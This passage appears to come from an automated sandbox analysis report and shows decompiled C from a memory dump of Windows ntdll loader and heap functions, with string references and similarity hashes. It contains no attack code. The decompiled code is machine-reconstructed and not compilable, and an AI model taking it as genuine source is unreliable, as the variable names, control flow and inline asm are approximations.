                                                                        												_t105 = E0151F380(_t136, 0x14b1184, 0x10);
                                                                        												__eflags = _t105;
                                                                        												if(_t105 != 0) {
                                                                        													__eflags =  *_t157 -  *_v16;
                                                                        													if( *_t157 >=  *_v16) {
                                                                        														goto L22;
                                                                        													} else {
                                                                        														asm("cdq");
                                                                        														_t166 = _t157[5] & 0x0000ffff;
                                                                        														_t108 = _t157[5] & 0x0000ffff;
                                                                        														asm("cdq");
                                                                        														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                                                                        														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                                                                        														if(__eflags > 0) {
                                                                        															L29:
                                                                        															E014F2280(_t108, 0x15c86cc);
                                                                        															 *_t118 =  *_t118 + 1;
                                                                        															_t42 = _t118 + 0x40; // 0x3f
                                                                        															_t156 = _t42;
                                                                        															asm("adc dword [ebx+0x4], 0x0");
                                                                        															asm("movsd");
                                                                        															asm("movsd");
                                                                        															asm("movsd");
                                                                        															asm("movsd");
                                                                        															_t110 = E015061A0( &_v32);
                                                                        															__eflags = _t110;
                                                                        															if(_t110 != 0) {
                                                                        																__eflags = _v32 | _v28;
                                                                        																if((_v32 | _v28) != 0) {
                                                                        																	_t134 = _v20;
                                                                        																	L55:
                                                                        																	E015A9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                                                                        																}
                                                                        															}
                                                                        															L30:
                                                                        															 *_t118 =  *_t118 + 1;
                                                                        															asm("adc dword [ebx+0x4], 0x0");
                                                                        															E014EFFB0(_t118, _t156, 0x15c86cc);
                                                                        															goto L22;
                                                                        														} else {
                                                                        															if(__eflags < 0) {
                                                                        																goto L22;
                                                                        															} else {
                                                                        																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                                                                        																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                                                                        																	goto L22;
                                                                        																} else {
                                                                        																	goto L29;
                                                                        																}
                                                                        															}
                                                                        														}
                                                                        													}
                                                                        													goto L56;
                                                                        												}
                                                                        												goto L22;
                                                                        											}
                                                                        											asm("lock inc dword [eax]");
                                                                        											goto L21;
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						return _t143;
                                                                        					}
                                                                        				} else {
                                                                        					_push( &_v8);
                                                                        					_push( *((intOrPtr*)(__ecx + 0x50)));
                                                                        					_push(__ecx + 0x40);
                                                                        					_push(_t121);
                                                                        					_push(0xffffffff);
                                                                        					_t80 = E01519A00();
                                                                        					_t159 = _t80;
                                                                        					if(_t159 < 0) {
                                                                        						L8:
                                                                        						return _t80;
                                                                        					} else {
                                                                        						goto L2;
                                                                        					}
                                                                        				}
                                                                        				L56:
                                                                        			}

                                                                        Strings
                                                                        • minkernel\ntdll\ldrsnap.c, xrefs: 01539C28
                                                                        • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01539C18
                                                                        • LdrpDoPostSnapWork, xrefs: 01539C1E
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                        • API String ID: 2994545307-1948996284
                                                                        • Opcode ID: d97c5c86424732ac9cc2e5739da8c850e87bac2a7c3d181038deb7e0b1d99851
                                                                        • Instruction ID: bff1b4d13eed1723518961b707faa74124819f31de85f69b670f9e444b3b354f
                                                                        • Opcode Fuzzy Hash: d97c5c86424732ac9cc2e5739da8c850e87bac2a7c3d181038deb7e0b1d99851
                                                                        • Instruction Fuzzy Hash: D4912271A0020B9FEF19CF99D8849BAB7F5FF94306B05416BDD01AB261E770E901CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 98%
                                                                        			E014E7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                        				char _v8;
                                                                        				intOrPtr _v12;
                                                                        				intOrPtr _v16;
                                                                        				intOrPtr _v20;
                                                                        				char _v24;
                                                                        				signed int _t73;
                                                                        				void* _t77;
                                                                        				char* _t82;
                                                                        				char* _t87;
                                                                        				signed char* _t97;
                                                                        				signed char _t102;
                                                                        				intOrPtr _t107;
                                                                        				signed char* _t108;
                                                                        				intOrPtr _t112;
                                                                        				intOrPtr _t124;
                                                                        				intOrPtr _t125;
                                                                        				intOrPtr _t126;
                                                                        
                                                                        				_t107 = __edx;
                                                                        				_v12 = __ecx;
                                                                        				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                                                                        				_t124 = 0;
                                                                        				_v20 = __edx;
                                                                        				if(E014ECEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                                                                        					_t112 = _v8;
                                                                        				} else {
                                                                        					_t112 = 0;
                                                                        					_v8 = 0;
                                                                        				}
                                                                        				if(_t112 != 0) {
                                                                        					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                                                                        						_t124 = 0xc000007b;
                                                                        						goto L8;
                                                                        					}
                                                                        					_t73 =  *(_t125 + 0x34) | 0x00400000;
                                                                        					 *(_t125 + 0x34) = _t73;
                                                                        					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                                                                        						goto L3;
                                                                        					}
                                                                        					 *(_t125 + 0x34) = _t73 | 0x01000000;
                                                                        					_t124 = E014DC9A4( *((intOrPtr*)(_t125 + 0x18)));
                                                                        					if(_t124 < 0) {
                                                                        						goto L8;
                                                                        					} else {
                                                                        						goto L3;
                                                                        					}
                                                                        				} else {
                                                                        					L3:
                                                                        					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                                                                        						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                                                                        						L8:
                                                                        						return _t124;
                                                                        					}
                                                                        					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                                                                        						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                                                                        							goto L5;
                                                                        						}
                                                                        						_t102 =  *0x15c5780; // 0x0
                                                                        						if((_t102 & 0x00000003) != 0) {
                                                                        							E01555510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                                                                        							_t102 =  *0x15c5780; // 0x0
                                                                        						}
                                                                        						if((_t102 & 0x00000010) != 0) {
                                                                        							asm("int3");
                                                                        						}
                                                                        						_t124 = 0xc0000428;
                                                                        						goto L8;
                                                                        					}
                                                                        					L5:
                                                                        					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                                                                        						goto L8;
                                                                        					}
                                                                        					_t77 = _a4 - 0x40000003;
                                                                        					if(_t77 == 0 || _t77 == 0x33) {
                                                                        						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                                                                        						if(E014F7D50() != 0) {
                                                                        							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                        						} else {
                                                                        							_t82 = 0x7ffe0384;
                                                                        						}
                                                                        						_t108 = 0x7ffe0385;
                                                                        						if( *_t82 != 0) {
                                                                        							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                                        								if(E014F7D50() == 0) {
                                                                        									_t97 = 0x7ffe0385;
                                                                        								} else {
                                                                        									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                        								}
                                                                        								if(( *_t97 & 0x00000020) != 0) {
                                                                        									E01557016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						if(_a4 != 0x40000003) {
                                                                        							L14:
                                                                        							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                                                                        							if(E014F7D50() != 0) {
                                                                        								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                        							} else {
                                                                        								_t87 = 0x7ffe0384;
                                                                        							}
                                                                        							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                                        								if(E014F7D50() != 0) {
                                                                        									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                        								}
                                                                        								if(( *_t108 & 0x00000020) != 0) {
                                                                        									E01557016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                                                                        								}
                                                                        							}
                                                                        							goto L8;
                                                                        						} else {
                                                                        							_v16 = _t125 + 0x24;
                                                                        							_t124 = E0150A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                                                                        							if(_t124 < 0) {
                                                                        								E014DB1E1(_t124, 0x1490, 0, _v16);
                                                                        								goto L8;
                                                                        							}
                                                                        							goto L14;
                                                                        						}
                                                                        					} else {
                                                                        						goto L8;
                                                                        					}
                                                                        				}
                                                                        			}





















                                                                        Strings
                                                                        • LdrpCompleteMapModule, xrefs: 01539898
                                                                        • minkernel\ntdll\ldrmap.c, xrefs: 015398A2
                                                                        • Could not validate the crypto signature for DLL %wZ, xrefs: 01539891
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                        • API String ID: 0-1676968949
                                                                        • Opcode ID: f6eb87d8d560118bd7ac6c92bad98289b8bff0172156e8ebfbe6e8e34e7b28d6
                                                                        • Instruction ID: 78f9dfd6800d38b1585a10eb1406ad0ff68bf8c119c34e10368bea762ce112a8
                                                                        • Opcode Fuzzy Hash: f6eb87d8d560118bd7ac6c92bad98289b8bff0172156e8ebfbe6e8e34e7b28d6
                                                                        • Instruction Fuzzy Hash: 1F51D0716007469BEB21CB6CC988B6ABBE4FB80736F14059AE9519B3E1D774E901CBD0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E014DE620(void* __ecx, short* __edx, short* _a4) {
                                                                        				char _v16;
                                                                        				char _v20;
                                                                        				intOrPtr _v24;
                                                                        				char* _v28;
                                                                        				char _v32;
                                                                        				char _v36;
                                                                        				char _v44;
                                                                        				signed int _v48;
                                                                        				intOrPtr _v52;
                                                                        				void* _v56;
                                                                        				void* _v60;
                                                                        				char _v64;
                                                                        				void* _v68;
                                                                        				void* _v76;
                                                                        				void* _v84;
                                                                        				signed int _t59;
                                                                        				signed int _t74;
                                                                        				signed short* _t75;
                                                                        				signed int _t76;
                                                                        				signed short* _t78;
                                                                        				signed int _t83;
                                                                        				short* _t93;
                                                                        				signed short* _t94;
                                                                        				short* _t96;
                                                                        				void* _t97;
                                                                        				signed int _t99;
                                                                        				void* _t101;
                                                                        				void* _t102;
                                                                        
                                                                        				_t80 = __ecx;
                                                                        				_t101 = (_t99 & 0xfffffff8) - 0x34;
                                                                        				_t96 = __edx;
                                                                        				_v44 = __edx;
                                                                        				_t78 = 0;
                                                                        				_v56 = 0;
                                                                        				if(__ecx == 0 || __edx == 0) {
                                                                        					L28:
                                                                        					_t97 = 0xc000000d;
                                                                        				} else {
                                                                        					_t93 = _a4;
                                                                        					if(_t93 == 0) {
                                                                        						goto L28;
                                                                        					}
                                                                        					_t78 = E014DF358(__ecx, 0xac);
                                                                        					if(_t78 == 0) {
                                                                        						_t97 = 0xc0000017;
                                                                        						L6:
                                                                        						if(_v56 != 0) {
                                                                        							_push(_v56);
                                                                        							E015195D0();
                                                                        						}
                                                                        						if(_t78 != 0) {
                                                                        							L014F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                                                                        						}
                                                                        						return _t97;
                                                                        					}
                                                                        					E0151FA60(_t78, 0, 0x158);
                                                                        					_v48 = _v48 & 0x00000000;
                                                                        					_t102 = _t101 + 0xc;
                                                                        					 *_t96 = 0;
                                                                        					 *_t93 = 0;
                                                                        					E0151BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                                                                        					_v36 = 0x18;
                                                                        					_v28 =  &_v44;
                                                                        					_v64 = 0;
                                                                        					_push( &_v36);
                                                                        					_push(0x20019);
                                                                        					_v32 = 0;
                                                                        					_push( &_v64);
                                                                        					_v24 = 0x40;
                                                                        					_v20 = 0;
                                                                        					_v16 = 0;
                                                                        					_t97 = E01519600();
                                                                        					if(_t97 < 0) {
                                                                        						goto L6;
                                                                        					}
                                                                        					E0151BB40(0,  &_v36, L"InstallLanguageFallback");
                                                                        					_push(0);
                                                                        					_v48 = 4;
                                                                        					_t97 = L014DF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                                                                        					if(_t97 >= 0) {
                                                                        						if(_v52 != 1) {
                                                                        							L17:
                                                                        							_t97 = 0xc0000001;
                                                                        							goto L6;
                                                                        						}
                                                                        						_t59 =  *_t78 & 0x0000ffff;
                                                                        						_t94 = _t78;
                                                                        						_t83 = _t59;
                                                                        						if(_t59 == 0) {
                                                                        							L19:
                                                                        							if(_t83 == 0) {
                                                                        								L23:
                                                                        								E0151BB40(_t83, _t102 + 0x24, _t78);
                                                                        								if(L014E43C0( &_v48,  &_v64) == 0) {
                                                                        									goto L17;
                                                                        								}
                                                                        								_t84 = _v48;
                                                                        								 *_v48 = _v56;
                                                                        								if( *_t94 != 0) {
                                                                        									E0151BB40(_t84, _t102 + 0x24, _t94);
                                                                        									if(L014E43C0( &_v48,  &_v64) != 0) {
                                                                        										 *_a4 = _v56;
                                                                        									} else {
                                                                        										_t97 = 0xc0000001;
                                                                        										 *_v48 = 0;
                                                                        									}
                                                                        								}
                                                                        								goto L6;
                                                                        							}
                                                                        							_t83 = _t83 & 0x0000ffff;
                                                                        							while(_t83 == 0x20) {
                                                                        								_t94 =  &(_t94[1]);
                                                                        								_t74 =  *_t94 & 0x0000ffff;
                                                                        								_t83 = _t74;
                                                                        								if(_t74 != 0) {
                                                                        									continue;
                                                                        								}
                                                                        								goto L23;
                                                                        							}
                                                                        							goto L23;
                                                                        						} else {
                                                                        							goto L14;
                                                                        						}
                                                                        						while(1) {
                                                                        							L14:
                                                                        							_t27 =  &(_t94[1]); // 0x2
                                                                        							_t75 = _t27;
                                                                        							if(_t83 == 0x2c) {
                                                                        								break;
                                                                        							}
                                                                        							_t94 = _t75;
                                                                        							_t76 =  *_t94 & 0x0000ffff;
                                                                        							_t83 = _t76;
                                                                        							if(_t76 != 0) {
                                                                        								continue;
                                                                        							}
                                                                        							goto L23;
                                                                        						}
                                                                        						 *_t94 = 0;
                                                                        						_t94 = _t75;
                                                                        						_t83 =  *_t75 & 0x0000ffff;
                                                                        						goto L19;
                                                                        					}
                                                                        				}
                                                                        			}
































                                                                        Strings
                                                                        • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 014DE68C
                                                                        • InstallLanguageFallback, xrefs: 014DE6DB
                                                                        • @, xrefs: 014DE6C0
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                        • API String ID: 0-1757540487
                                                                        • Opcode ID: fd53f8a3ff7c6730e6b82e925e8d188c98876f669ed68578c31a50c8e7eae9cb
                                                                        • Instruction ID: aadf418b15a03e117bf4c3d5d5793f2da40c5d666d0b72d73447dac1d97d455b
                                                                        • Opcode Fuzzy Hash: fd53f8a3ff7c6730e6b82e925e8d188c98876f669ed68578c31a50c8e7eae9cb
                                                                        • Instruction Fuzzy Hash: 3D51D3726183069BDB25DF28C450A6FB7E8BFD8614F05092EF989EB250F735D904C7A2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 60%
                                                                        			E0159E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
                                                                        				signed int _v20;
                                                                        				char _v24;
                                                                        				signed int _v40;
                                                                        				char _v44;
                                                                        				intOrPtr _v48;
                                                                        				signed int _v52;
                                                                        				unsigned int _v56;
                                                                        				char _v60;
                                                                        				signed int _v64;
                                                                        				char _v68;
                                                                        				signed int _v72;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				char _t87;
                                                                        				signed int _t90;
                                                                        				signed int _t94;
                                                                        				signed int _t100;
                                                                        				intOrPtr* _t113;
                                                                        				signed int _t122;
                                                                        				void* _t132;
                                                                        				void* _t135;
                                                                        				signed int _t139;
                                                                        				signed int* _t141;
                                                                        				signed int _t146;
                                                                        				signed int _t147;
                                                                        				void* _t153;
                                                                        				signed int _t155;
                                                                        				signed int _t159;
                                                                        				char _t166;
                                                                        				void* _t172;
                                                                        				void* _t176;
                                                                        				signed int _t177;
                                                                        				intOrPtr* _t179;
                                                                        
                                                                        				_t179 = __ecx;
                                                                        				_v48 = __edx;
                                                                        				_v68 = 0;
                                                                        				_v72 = 0;
                                                                        				_push(__ecx[1]);
                                                                        				_push( *__ecx);
                                                                        				_push(0);
                                                                        				_t153 = 0x14;
                                                                        				_t135 = _t153;
                                                                        				_t132 = E0159BBBB(_t135, _t153);
                                                                        				if(_t132 == 0) {
                                                                        					_t166 = _v68;
                                                                        					goto L43;
                                                                        				} else {
                                                                        					_t155 = 0;
                                                                        					_v52 = 0;
                                                                        					asm("stosd");
                                                                        					asm("stosd");
                                                                        					asm("stosd");
                                                                        					asm("stosd");
                                                                        					asm("stosd");
                                                                        					_v56 = __ecx[1];
                                                                        					if( *__ecx >> 8 < 2) {
                                                                        						_t155 = 1;
                                                                        						_v52 = 1;
                                                                        					}
                                                                        					_t139 = _a4;
                                                                        					_t87 = (_t155 << 0xc) + _t139;
                                                                        					_v60 = _t87;
                                                                        					if(_t87 < _t139) {
                                                                        						L11:
                                                                        						_t166 = _v68;
                                                                        						L12:
                                                                        						if(_t132 != 0) {
                                                                        							E0159BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
                                                                        						}
                                                                        						L43:
                                                                        						if(_v72 != 0) {
                                                                        							_push( *((intOrPtr*)(_t179 + 4)));
                                                                        							_push( *_t179);
                                                                        							_push(0x8000);
                                                                        							E0159AFDE( &_v72,  &_v60);
                                                                        						}
                                                                        						L46:
                                                                        						return _t166;
                                                                        					}
                                                                        					_t90 =  *(_t179 + 0xc) & 0x40000000;
                                                                        					asm("sbb edi, edi");
                                                                        					_t172 = ( ~_t90 & 0x0000003c) + 4;
                                                                        					if(_t90 != 0) {
                                                                        						_push(0);
                                                                        						_push(0x14);
                                                                        						_push( &_v44);
                                                                        						_push(3);
                                                                        						_push(_t179);
                                                                        						_push(0xffffffff);
                                                                        						if(E01519730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
                                                                        							_push(_t139);
                                                                        							E0159A80D(_t179, 1, _v40, 0);
                                                                        							_t172 = 4;
                                                                        						}
                                                                        					}
                                                                        					_t141 =  &_v72;
                                                                        					if(E0159A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
                                                                        						_v64 = _a4;
                                                                        						_t94 =  *(_t179 + 0xc) & 0x40000000;
                                                                        						asm("sbb edi, edi");
                                                                        						_t176 = ( ~_t94 & 0x0000003c) + 4;
                                                                        						if(_t94 != 0) {
                                                                        							_push(0);
                                                                        							_push(0x14);
                                                                        							_push( &_v24);
                                                                        							_push(3);
                                                                        							_push(_t179);
                                                                        							_push(0xffffffff);
                                                                        							if(E01519730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
                                                                        								_push(_t141);
                                                                        								E0159A80D(_t179, 1, _v20, 0);
                                                                        								_t176 = 4;
                                                                        							}
                                                                        						}
                                                                        						if(E0159A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
                                                                        							goto L11;
                                                                        						} else {
                                                                        							_t177 = _v64;
                                                                        							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
                                                                        							_t100 = _v52 + _v52;
                                                                        							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
                                                                        							 *(_t132 + 0x10) = _t146;
                                                                        							asm("bsf eax, [esp+0x18]");
                                                                        							_v52 = _t100;
                                                                        							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
                                                                        							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
                                                                        							_t47 =  &_a8;
                                                                        							 *_t47 = _a8 & 0x00000001;
                                                                        							if( *_t47 == 0) {
                                                                        								E014F2280(_t179 + 0x30, _t179 + 0x30);
                                                                        							}
                                                                        							_t147 =  *(_t179 + 0x34);
                                                                        							_t159 =  *(_t179 + 0x38) & 1;
                                                                        							_v68 = 0;
                                                                        							if(_t147 == 0) {
                                                                        								L35:
                                                                        								E014EB090(_t179 + 0x34, _t147, _v68, _t132);
                                                                        								if(_a8 == 0) {
                                                                        									E014EFFB0(_t132, _t177, _t179 + 0x30);
                                                                        								}
                                                                        								asm("lock xadd [eax], ecx");
                                                                        								asm("lock xadd [eax], edx");
                                                                        								_t132 = 0;
                                                                        								_v72 = _v72 & 0;
                                                                        								_v68 = _v72;
                                                                        								if(E014F7D50() == 0) {
                                                                        									_t113 = 0x7ffe0388;
                                                                        								} else {
                                                                        									_t177 = _v64;
                                                                        									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                        								}
                                                                        								if( *_t113 == _t132) {
                                                                        									_t166 = _v68;
                                                                        									goto L46;
                                                                        								} else {
                                                                        									_t166 = _v68;
                                                                        									E0158FEC0(_t132, _t179, _t166, _t177 + 0x1000);
                                                                        									goto L12;
                                                                        								}
                                                                        							} else {
                                                                        								L23:
                                                                        								while(1) {
                                                                        									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
                                                                        										_t122 =  *_t147;
                                                                        										if(_t159 == 0) {
                                                                        											L32:
                                                                        											if(_t122 == 0) {
                                                                        												L34:
                                                                        												_v68 = 0;
                                                                        												goto L35;
                                                                        											}
                                                                        											L33:
                                                                        											_t147 = _t122;
                                                                        											continue;
                                                                        										}
                                                                        										if(_t122 == 0) {
                                                                        											goto L34;
                                                                        										}
                                                                        										_t122 = _t122 ^ _t147;
                                                                        										goto L32;
                                                                        									}
                                                                        									_t122 =  *(_t147 + 4);
                                                                        									if(_t159 == 0) {
                                                                        										L27:
                                                                        										if(_t122 != 0) {
                                                                        											goto L33;
                                                                        										}
                                                                        										L28:
                                                                        										_v68 = 1;
                                                                        										goto L35;
                                                                        									}
                                                                        									if(_t122 == 0) {
                                                                        										goto L28;
                                                                        									}
                                                                        									_t122 = _t122 ^ _t147;
                                                                        									goto L27;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					_v72 = _v72 & 0x00000000;
                                                                        					goto L11;
                                                                        				}
                                                                        			}





































                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: `$`
                                                                        • API String ID: 0-197956300
                                                                        • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                        • Instruction ID: 764c53da9709b230bca8fdfd1693154e680bf866dea14316edd37ab8766e9800
                                                                        • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                        • Instruction Fuzzy Hash: 6A915C312043429BEB25CF29C942B5BBBE5FF84714F14892DF695CA290E774E904CB93
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 77%
                                                                        			E015551BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                        				signed short* _t63;
                                                                        				signed int _t64;
                                                                        				signed int _t65;
                                                                        				signed int _t67;
                                                                        				intOrPtr _t74;
                                                                        				intOrPtr _t84;
                                                                        				intOrPtr _t88;
                                                                        				intOrPtr _t94;
                                                                        				void* _t100;
                                                                        				void* _t103;
                                                                        				intOrPtr _t105;
                                                                        				signed int _t106;
                                                                        				short* _t108;
                                                                        				signed int _t110;
                                                                        				signed int _t113;
                                                                        				signed int* _t115;
                                                                        				signed short* _t117;
                                                                        				void* _t118;
                                                                        				void* _t119;
                                                                        
                                                                        				_push(0x80);
                                                                        				_push(0x15b05f0);
                                                                        				E0152D0E8(__ebx, __edi, __esi);
                                                                        				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                                                                        				_t115 =  *(_t118 + 0xc);
                                                                        				 *(_t118 - 0x7c) = _t115;
                                                                        				 *((char*)(_t118 - 0x65)) = 0;
                                                                        				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                                        				_t113 = 0;
                                                                        				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                                                                        				 *((intOrPtr*)(_t118 - 4)) = 0;
                                                                        				_t100 = __ecx;
                                                                        				if(_t100 == 0) {
                                                                        					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                                                        					E014EEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                        					 *((char*)(_t118 - 0x65)) = 1;
                                                                        					_t63 =  *(_t118 - 0x90);
                                                                        					_t101 = _t63[2];
                                                                        					_t64 =  *_t63 & 0x0000ffff;
                                                                        					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                                        					L20:
                                                                        					_t65 = _t64 >> 1;
                                                                        					L21:
                                                                        					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                                                                        					if(_t108 == 0) {
                                                                        						L27:
                                                                        						 *_t115 = _t65 + 1;
                                                                        						_t67 = 0xc0000023;
                                                                        						L28:
                                                                        						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                                                                        						L29:
                                                                        						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                                                                        						E015553CA(0);
                                                                        						return E0152D130(0, _t113, _t115);
                                                                        					}
                                                                        					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                                                                        						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                                                                        							 *_t108 = 0;
                                                                        						}
                                                                        						goto L27;
                                                                        					}
                                                                        					 *_t115 = _t65;
                                                                        					_t115 = _t65 + _t65;
                                                                        					E0151F3E0(_t108, _t101, _t115);
                                                                        					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                                                                        					_t67 = 0;
                                                                        					goto L28;
                                                                        				}
                                                                        				_t103 = _t100 - 1;
                                                                        				if(_t103 == 0) {
                                                                        					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                                                                        					_t74 = E014F3690(1, _t117, 0x14b1810, _t118 - 0x74);
                                                                        					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                                                                        					_t101 = _t117[2];
                                                                        					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                                        					if(_t74 < 0) {
                                                                        						_t64 =  *_t117 & 0x0000ffff;
                                                                        						_t115 =  *(_t118 - 0x7c);
                                                                        						goto L20;
                                                                        					}
                                                                        					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                                                                        					_t115 =  *(_t118 - 0x7c);
                                                                        					goto L21;
                                                                        				}
                                                                        				if(_t103 == 1) {
                                                                        					_t105 = 4;
                                                                        					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                                                                        					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                                                                        					_push(_t118 - 0x70);
                                                                        					_push(0);
                                                                        					_push(0);
                                                                        					_push(_t105);
                                                                        					_push(_t118 - 0x78);
                                                                        					_push(0x6b);
                                                                        					 *((intOrPtr*)(_t118 - 0x64)) = E0151AA90();
                                                                        					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                                        					_t113 = L014F4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                                                                        					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                                                                        					if(_t113 != 0) {
                                                                        						_push(_t118 - 0x70);
                                                                        						_push( *((intOrPtr*)(_t118 - 0x70)));
                                                                        						_push(_t113);
                                                                        						_push(4);
                                                                        						_push(_t118 - 0x78);
                                                                        						_push(0x6b);
                                                                        						_t84 = E0151AA90();
                                                                        						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                                                                        						if(_t84 < 0) {
                                                                        							goto L29;
                                                                        						}
                                                                        						_t110 = 0;
                                                                        						_t106 = 0;
                                                                        						while(1) {
                                                                        							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                                                                        							 *(_t118 - 0x88) = _t106;
                                                                        							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                                                                        								break;
                                                                        							}
                                                                        							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                                                                        							_t106 = _t106 + 1;
                                                                        						}
